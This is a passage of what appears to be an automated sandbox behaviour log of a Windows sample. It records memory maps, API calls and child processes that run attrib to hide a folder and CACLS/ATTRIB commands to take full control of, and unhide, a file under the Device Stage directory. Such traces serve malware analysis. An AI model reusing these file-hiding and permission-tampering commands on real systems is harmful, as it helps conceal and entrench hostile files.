end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 19483 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 19484 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 19485 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 19486 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 19487 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 19488 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 19489 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 19490 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: 
"c:\\windows\\system32\\sechost.dll") Region: id = 19491 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 19492 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 19493 start_va = 0x1b0000 end_va = 0x277fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 19494 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 19495 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 295 os_tid = 0xb94 Process: id = "234" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16b60" os_pid = "0x610" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "231" os_parent_pid = "0x698" cmd_line = "attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 19496 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" 
filename = "" Region: id = 19497 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 19498 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 19499 start_va = 0x150000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 19500 start_va = 0xcf0000 end_va = 0xcf6fff entry_point = 0xcf0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 19501 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 19502 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 19503 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 19504 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 19505 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 19506 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 19507 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 19508 start_va = 0x50000 end_va = 0xb6fff entry_point = 
0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 19509 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 19510 start_va = 0x430000 end_va = 0x43ffff entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 19511 start_va = 0x6e440000 end_va = 0x6e45cfff entry_point = 0x6e440000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 19512 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 19513 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 19514 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 19515 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 19516 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 19517 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" 
(normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 19518 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 19519 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 19520 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 19521 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 19522 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 19523 start_va = 0x2d0000 end_va = 0x397fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 19524 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 19525 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 296 os_tid = 0x47c Process: id = "235" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea167a0" os_pid = "0x170" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" 
os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 19548 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 19549 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 19550 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 19551 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 19552 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 19553 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 19554 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = 
"\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 19555 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 19556 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 19557 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 19558 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 19559 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 19560 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 19561 start_va = 0x310000 end_va = 0x40ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 19562 start_va = 0x4f0000 end_va = 0x4fffff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 19563 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 19564 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 19565 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = 
"\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 19566 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 19567 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 19568 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 19569 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 19570 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 19571 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 19572 start_va = 0x410000 end_va = 0x4d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 19573 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 19574 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 19575 
start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 19576 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 19577 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 19578 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 19579 start_va = 0x500000 end_va = 0x600fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 19580 start_va = 0x610000 end_va = 0x120ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19581 start_va = 0x1210000 end_va = 0x1372fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001210000" filename = "" Region: id = 19582 start_va = 0x1380000 end_va = 0x164efff entry_point = 0x1380000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 297 os_tid = 0xcf8 [0150.288] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26fa94 | out: lpSystemTimeAsFileTime=0x26fa94*(dwLowDateTime=0x9383b500, dwHighDateTime=0x1d440a9)) [0150.288] GetCurrentProcessId () returned 0x170 [0150.288] GetCurrentThreadId () returned 0xcf8 [0150.288] GetTickCount () returned 0x2e7fd [0150.288] QueryPerformanceCounter (in: lpPerformanceCount=0x26fa8c | out: lpPerformanceCount=0x26fa8c*=20707728273) returned 1 [0150.289] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0150.289] __set_app_type (_Type=0x1) [0150.289] __p__fmode () returned 0x76b331f4 [0150.289] __p__commode () returned 0x76b331fc [0150.289] 
SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0150.289] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0150.289] GetCurrentThreadId () returned 0xcf8 [0150.289] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xcf8) returned 0x38 [0150.289] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0150.289] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0150.289] SetThreadUILanguage (LangId=0x0) returned 0x409 [0150.289] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0150.289] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26fa24 | out: phkResult=0x26fa24*=0x0) returned 0x2 [0150.289] VirtualQuery (in: lpAddress=0x26fa5b, lpBuffer=0x26f9f4, dwLength=0x1c | out: lpBuffer=0x26f9f4*(BaseAddress=0x26f000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0150.290] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x26f9f4, dwLength=0x1c | out: lpBuffer=0x26f9f4*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0150.290] VirtualQuery (in: lpAddress=0x171000, lpBuffer=0x26f9f4, dwLength=0x1c | out: lpBuffer=0x26f9f4*(BaseAddress=0x171000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0150.290] VirtualQuery (in: lpAddress=0x173000, lpBuffer=0x26f9f4, dwLength=0x1c | out: lpBuffer=0x26f9f4*(BaseAddress=0x173000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) 
returned 0x1c [0150.290] VirtualQuery (in: lpAddress=0x270000, lpBuffer=0x26f9f4, dwLength=0x1c | out: lpBuffer=0x26f9f4*(BaseAddress=0x270000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xa0000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0150.290] GetConsoleOutputCP () returned 0x1b5 [0150.290] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0150.290] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0150.290] _get_osfhandle (_FileHandle=1) returned 0x7 [0150.290] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0150.290] _get_osfhandle (_FileHandle=1) returned 0x7 [0150.290] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0150.290] _get_osfhandle (_FileHandle=1) returned 0x7 [0150.290] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0150.290] _get_osfhandle (_FileHandle=0) returned 0x3 [0150.290] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0150.291] _get_osfhandle (_FileHandle=0) returned 0x3 [0150.291] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0150.291] GetEnvironmentStringsW () returned 0x320370* [0150.291] FreeEnvironmentStringsW (penv=0x320370) returned 1 [0150.291] GetEnvironmentStringsW () returned 0x320370* [0150.291] FreeEnvironmentStringsW (penv=0x320370) returned 1 [0150.291] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26e994 | out: phkResult=0x26e994*=0x40) returned 0x0 [0150.291] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26e99c, lpData=0x26e9a0, lpcbData=0x26e998*=0x1000 | out: lpType=0x26e99c*=0x0, lpData=0x26e9a0*=0x20, lpcbData=0x26e998*=0x1000) returned 0x2 [0150.291] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26e99c, lpData=0x26e9a0, 
lpcbData=0x26e998*=0x1000 | out: lpType=0x26e99c*=0x4, lpData=0x26e9a0*=0x1, lpcbData=0x26e998*=0x4) returned 0x0 [0150.291] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26e99c, lpData=0x26e9a0, lpcbData=0x26e998*=0x1000 | out: lpType=0x26e99c*=0x0, lpData=0x26e9a0*=0x1, lpcbData=0x26e998*=0x1000) returned 0x2 [0150.291] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26e99c, lpData=0x26e9a0, lpcbData=0x26e998*=0x1000 | out: lpType=0x26e99c*=0x4, lpData=0x26e9a0*=0x0, lpcbData=0x26e998*=0x4) returned 0x0 [0150.291] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26e99c, lpData=0x26e9a0, lpcbData=0x26e998*=0x1000 | out: lpType=0x26e99c*=0x4, lpData=0x26e9a0*=0x40, lpcbData=0x26e998*=0x4) returned 0x0 [0150.291] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26e99c, lpData=0x26e9a0, lpcbData=0x26e998*=0x1000 | out: lpType=0x26e99c*=0x4, lpData=0x26e9a0*=0x40, lpcbData=0x26e998*=0x4) returned 0x0 [0150.291] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26e99c, lpData=0x26e9a0, lpcbData=0x26e998*=0x1000 | out: lpType=0x26e99c*=0x0, lpData=0x26e9a0*=0x40, lpcbData=0x26e998*=0x1000) returned 0x2 [0150.291] RegCloseKey (hKey=0x40) returned 0x0 [0150.291] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26e994 | out: phkResult=0x26e994*=0x40) returned 0x0 [0150.291] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26e99c, lpData=0x26e9a0, lpcbData=0x26e998*=0x1000 | out: lpType=0x26e99c*=0x0, lpData=0x26e9a0*=0x40, lpcbData=0x26e998*=0x1000) returned 0x2 [0150.291] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26e99c, lpData=0x26e9a0, lpcbData=0x26e998*=0x1000 | out: lpType=0x26e99c*=0x4, 
lpData=0x26e9a0*=0x1, lpcbData=0x26e998*=0x4) returned 0x0 [0150.292] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26e99c, lpData=0x26e9a0, lpcbData=0x26e998*=0x1000 | out: lpType=0x26e99c*=0x0, lpData=0x26e9a0*=0x1, lpcbData=0x26e998*=0x1000) returned 0x2 [0150.292] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26e99c, lpData=0x26e9a0, lpcbData=0x26e998*=0x1000 | out: lpType=0x26e99c*=0x4, lpData=0x26e9a0*=0x0, lpcbData=0x26e998*=0x4) returned 0x0 [0150.292] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26e99c, lpData=0x26e9a0, lpcbData=0x26e998*=0x1000 | out: lpType=0x26e99c*=0x4, lpData=0x26e9a0*=0x9, lpcbData=0x26e998*=0x4) returned 0x0 [0150.292] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26e99c, lpData=0x26e9a0, lpcbData=0x26e998*=0x1000 | out: lpType=0x26e99c*=0x4, lpData=0x26e9a0*=0x9, lpcbData=0x26e998*=0x4) returned 0x0 [0150.292] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26e99c, lpData=0x26e9a0, lpcbData=0x26e998*=0x1000 | out: lpType=0x26e99c*=0x0, lpData=0x26e9a0*=0x9, lpcbData=0x26e998*=0x1000) returned 0x2 [0150.292] RegCloseKey (hKey=0x40) returned 0x0 [0150.292] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886378 [0150.292] srand (_Seed=0x5b886378) [0150.292] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png\"" [0150.292] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H 
\"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png\"" [0150.292] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0150.292] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x321ad0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0150.292] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0150.292] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0150.292] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0150.292] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0150.292] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0150.293] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0150.293] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0150.293] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0150.293] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0150.293] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0150.293] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0150.293] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0150.293] GetEnvironmentStringsW () returned 0x3224c0* [0150.293] FreeEnvironmentStringsW (penv=0x3224c0) returned 1 [0150.293] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0150.293] 